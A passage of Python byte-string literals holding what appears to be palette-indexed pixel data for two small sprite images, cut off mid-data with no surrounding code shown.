b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\xbb\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\xbb\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x77\x77\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x00\x77\x77\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x00\x77\x77\x77\x77\x77\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x00\x77\x77\x77\x77\x77\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x77\x77\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x77\x77\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xbb\xbb\x22\x22\xbb\x22\x22\xbb\xbb\xbb\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x00\x00\x00'\
b'\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x77\x77\x77\x77\x00\x99\x99\x99'\
b'\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x77\x77\x00\x99\x99\x99\x99\x00\x00'\
b'\x00\xff\xff\xff\xff\x99\x99\x99\x99\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x77\x77\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\xff\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x77\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\x99\x00\x00\x00\xff\xff\xff\xff\x99\x99\xbb\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x00\x99\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00'\
b'\x00\x00\xff\xff\xff\x99\x99\x99\x99\x99\x99\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\xbb\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x00\x99\x99\x00\x00\x00\xff\xff\x99\x99\x99\x00\x00\x00'\
b'\xff\xff\x99\x99\x99\x99\xbb\x00\x00\x00\x00\xbb\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x00\x99\x99\x00\x00\x00\xff\x99\x99\x99\x00\x00\x00\xff\xff'\
b'\x99\x99\x99\xbb\xbb\x00\x00\xbb\xbb\xbb\xbb\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x00\x00\x00\xff\x99\x99\x00\x00\x00\xff\xff\x99\x99'\
b'\x99\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\x00\x99\x99\x99\x99\xff\x99\x99\x00\x00\x00\xff\x99\x99\x99\xbb'\
b'\xbb\xbb\xbb\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x99\x99\x99\x99\x00\x00\x00\xff\x99\x99\xcc\xbb\xbb'\
b'\xbb\xbb\xbb\x00\x00\x77\x77\x77\x77\x77\x77\x77\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x22\x22\x22\x99\x99\x99\x99\xff\x99\x99\xcc\xbb\xbb\xbb'\
b'\xbb\xbb\x00\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\xbb\x22\x99\x99\x22\x22\x22\x99\x99\x99\x99\xcc\xbb\xbb\xbb\xbb'\
b'\xbb\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x77\x00\x00'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\xcc\x99\x99\x22\x22\x22\xbb\xbb\xcc\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x77\x77'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x00\x77\x77\x00'\
b'\xbb\x22\x99\xcc\xcc\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x77\x77\x77\x77\x77\x77\x00\x77\x00\x00\x77\x77\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\xcc\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x77\x77\x77\x77\x00\x77\x77\x77\x77\x77\x77\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x00\x77\x77\x77\x00\x77\x00\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x99\x99\x22\xbb\x22\xbb\xbb\xbb\xbb\x00'\
b'\x77\x77\x00\x77\x00\x77\x77\x77\x00\x77\x00\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\x00'\
b'\x77\x77\x77\x77\x00\x00\x00\x00\x00\x00\x00\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\xbb\xbb\xbb\xbb'\
b'\x00\x77\x77\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\xbb\x00\xbb\xbb'\
b'\xbb\x00\x00\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\xbb\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\xbb\x00\x00'\
b'\xbb\xbb\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\xbb\xbb'\
b'\xbb\xbb\xbb\xbb\x22\x22\x22\x22\x22\x22\xbb\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x99\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\xbb\x22\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\xbb\x22\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\xbb\x22\x22\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\x22'\
b'\x22\x22\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\xbb\xbb\x22\x22\x22\x22\xbb\x22\x22\x22\x22\x22\xbb'\
b'\xbb\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
